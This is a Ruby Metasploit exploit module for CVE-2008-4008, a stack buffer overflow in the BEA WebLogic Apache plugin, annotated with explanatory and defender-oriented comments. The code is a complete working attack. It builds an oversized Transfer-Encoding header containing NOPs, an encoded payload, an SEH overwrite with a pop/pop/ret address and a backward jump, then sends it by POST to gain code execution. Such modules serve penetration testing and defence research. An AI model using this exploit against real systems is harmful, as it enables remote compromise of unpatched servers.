Path: blob/master/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2008-4008: a stack-based buffer overflow in the
# BEA WebLogic plugin for Apache, reached through the plugin's error
# reporting for an unrecognised Transfer-Encoding header.
#
# From a defender's point of view the whole trigger is a single HTTP POST
# carrying a Transfer-Encoding header value of roughly 5800 bytes; an
# HTTP-aware sensor that flags oversized or non-token Transfer-Encoding
# values will see it, and the vendor fix referenced by CVE-2008-4008
# removes the overflow. Vulnerable hosts should be patched rather than
# filtered.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  # Fingerprint hint for the framework; presumably matched against the
  # HTTP Server header before the module is offered — confirm against
  # the HttpClient mixin.
  HttpFingerprint = { :pattern => [ /Apache/ ] }

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Seh

  # Registers the module's metadata (name, references, payload
  # constraints, target and notes) with the framework via update_info.
  #
  # @param info [Hash] metadata supplied by the framework; merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'BEA Weblogic Transfer-Encoding Buffer Overflow',
        'Description' => %q{
          This module exploits a stack based buffer overflow in the BEA
          Weblogic Apache plugin. This vulnerability exists in the
          error reporting for unknown Transfer-Encoding headers.
          You may have to run this twice due to timing issues with handlers.
        },
        'Author' => 'pusscat',
        'References' => [
          [ 'CVE', '2008-4008' ],
          [ 'OSVDB', '49283' ]
        ],
        'DefaultOptions' => {
          # The payload unwinds via the SEH chain; matches the SEH-based
          # control-flow hijack used in #exploit.
          'EXITFUNC' => 'seh',
        },
        'Privileged' => true,
        'Platform' => 'win',
        'Payload' => {
          # Payload must fit in the first 500 bytes of the 5800-byte buffer
          # (the remainder is filler up to the SEH record at offset 5781).
          'Space' => 500,
          # NUL, CR and LF are excluded because the payload travels inside
          # an HTTP header value, where CR/LF end the header line.
          'BadChars' => "\x00\x0d\x0a",
          'StackAdjustment' => -1500,
        },
        'Targets' => [
          [
            'Windows Apache 2.2 version Universal',
            {
              # Address used as the SEH handler; trusted to be a
              # pop/pop/ret gadget per the author's comment — not
              # verifiable from this file.
              'Ret' => 0x1001f4d6, # pop/pop/ret
            }
          ],
        ],
        'DisclosureDate' => '2008-09-09',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Builds the 5800-byte header value and sends it in one POST.
  #
  # Buffer layout (offsets into +sploit+):
  #   0        .. 6                      seven NOPs
  #   7        .. 7+payload length       encoded payload
  #   5781     .. 5788                   SEH record from generate_seh_record
  #   5789     .. 5793                   5-byte relative jump back to offset 0
  # Everything else is random alphanumeric filler.
  #
  # @return [Object] whatever +handler+ returns; the payload session is
  #   managed by the framework's handler, not by this method
  def exploit
    sploit = rand_text_alphanumeric(5800)
    # 8-byte SEH record (short jump + handler address) at the overwrite
    # offset; the handler address comes from the selected target's Ret.
    sploit[5781, 8] = generate_seh_record(target.ret)
    # Jump backward to the payload
    # rel32 displacement 0xffffe95e = -5794; the instruction ends at
    # offset 5794, so execution lands at offset 0, the start of the NOPs.
    sploit[5789, 5] = "\xe9\x5e\xe9\xff\xff"
    sploit[0, payload.encoded.length + 7] = make_nops(7) + payload.encoded

    # NOTE(review): this unconditionally overwrites any VHOST the operator
    # configured, and the change persists in the datastore after the run;
    # a guard such as `datastore['VHOST'] ||= 'localhost'` would respect
    # a user-supplied value.
    datastore['VHOST'] = 'localhost'
    # The entire overflow buffer is carried in the Transfer-Encoding
    # header; the request body is intentionally empty.
    send_request_cgi(
      {
        'method' => 'POST',
        'url' => '/index.jsp',
        'data' => '',
        'headers' =>
        {
          'Transfer-Encoding' => sploit
        }
      }
    )

    # Hand off to the framework's payload handler (see the Description
    # note about timing: a second run may be needed).
    handler
  end
end